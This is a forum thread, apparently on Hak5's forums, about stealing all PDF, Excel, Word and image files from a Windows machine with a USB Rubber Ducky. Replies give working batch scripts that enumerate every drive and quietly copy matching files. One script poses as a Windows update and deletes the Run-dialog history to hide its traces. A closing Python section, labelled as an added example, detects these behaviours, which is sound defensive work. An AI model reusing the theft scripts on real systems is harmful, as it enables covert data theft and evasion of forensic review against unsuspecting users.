Posted

In Hak5's blog post about stealing files with the USB Rubber Ducky, they only targeted the documents folder on the C: drive. I'm looking to steal all .PDFs/Excel spreadsheets, regardless of their directory/drive. Can anyone show me how this is done? I have been trying all day now, but can't get a satisfactory result.

Thanks in advance! Any help would be greatly appreciated.

Posted

There are probably a few ways to do this.
Code below is untested on a ducky

REM Get all drive letters, skips name label
FOR /F "skip=1" %%A IN ('wmic logicaldisk get name') DO (
REM Check drive is not the ducky  
IF %%~dA NEQ %~d0 (
REM COPY FILE
xcopy /C /Q /G /Y /S %%A\*.pdf %dst% >>nul
)
)

or

REM Get all drive letters, skips name label
FOR /F "skip=1" %%A IN ('wmic logicaldisk get name') DO (
REM Check drive is not the ducky  
IF %%~dA NEQ %~d0 (
REM Call dir on each drive letter find files ending in .pdf or .xlsx
FOR /F "delims==" %%I IN ('dir %%A\ /s /b /a-d ^| findstr /ile ".pdf .xlsx"') DO (
REM COPY FILE
xcopy /C /Q /G /Y %%I %dst% >>nul
)
)
)

Hope this helps

Posted

Cribbit has a good point, but this will take forever.
If you have limited time to extract, you could consider using %homepath% to see where Windows stores files by default. In most company GPOs this will be directed to some network drive.
%temp% could have interesting stuff as well.


Cheers.

Posted

Need help here. Will it steal all pdf, doc, docx, jpeg, jpg from %USERPROFILE%?

e.cmd

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory comprised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.doc %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.docx %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.jpg %dst% >>nul
xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.jpeg %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit
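
Added example, not part of the original thread or of any poster's code: a defender-side triage of process-creation command lines for the behaviours the scripts above exhibit (RunMRU history deletion, quiet wildcard xcopy to a different drive, hidden PowerShell SendKeys, wmic drive enumeration). The event field names, rule names and sample records are constructed assumptions.

```python
import re
from collections import defaultdict

# Patterns for behaviours visible in the scripts in this thread (rule names are this example's own).
RULES = {
    "runmru_history_deleted": re.compile(r"\breg(\.exe)?\s+delete\s+\S*\\Explorer\\RunMRU\b", re.I),
    "drive_enumeration": re.compile(r"\bwmic(\.exe)?\s+logicaldisk\s+get\s+name\b", re.I),
    "hidden_powershell_sendkeys": re.compile(r"\bpowershell(\.exe)?\b.*-WindowStyle\s+Hidden.*SendKeys", re.I),
}

def quiet_cross_drive_xcopy(cmdline):
    """True for xcopy with /C /Q /Y on a wildcard source whose drive differs from the destination's."""
    tokens = cmdline.split()  # assumption: unquoted paths without spaces, as in the thread's scripts
    if not tokens or not re.search(r"(^|\\)xcopy(\.exe)?$", tokens[0], re.I):
        return False
    switches = {t.lower() for t in tokens[1:] if t.startswith("/")}
    paths = [t for t in tokens[1:] if re.match(r"[A-Za-z]:\\", t)]
    if not {"/c", "/q", "/y"} <= switches or len(paths) < 2:
        return False
    src, dst = paths[0], paths[1]
    return "*." in src and src[0].lower() != dst[0].lower()

def triage(events):
    """Group rule hits by parent process; alert when a quiet cross-drive copy coincides with another rule."""
    hits = defaultdict(set)
    for ev in events:
        cmd = ev["cmdline"]
        for name, rx in RULES.items():
            if rx.search(cmd):
                hits[ev["parent_pid"]].add(name)
        if quiet_cross_drive_xcopy(cmd):
            hits[ev["parent_pid"]].add("quiet_cross_drive_xcopy")
    return {pid: sorted(names) for pid, names in hits.items()
            if "quiet_cross_drive_xcopy" in names and len(names) > 1}

# Constructed process-creation records (shaped like Sysmon Event ID 1 fields), not real logs.
SAMPLE_EVENTS = [
    {"parent_pid": 4120, "cmdline": r"REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f"},
    {"parent_pid": 4120, "cmdline": r"xcopy /C /Q /G /Y /S C:\Users\alice\Documents\*.pdf E:\slurp\PC01_20240101_120000"},
    {"parent_pid": 4120, "cmdline": 'powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys(\'{CAPSLOCK}\')"'},
    {"parent_pid": 7312, "cmdline": r"xcopy /S /Y C:\build\out\*.dll C:\deploy\bin"},  # benign build copy
    {"parent_pid": 900, "cmdline": r"wmic logicaldisk get name"},  # enumeration alone does not alert
]

if __name__ == "__main__":
    for pid, names in triage(SAMPLE_EVENTS).items():
        print(pid, names)
```

Requiring the copy rule plus at least one other hit from the same parent keeps routine xcopy jobs and standalone wmic inventory queries out of the alert set.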
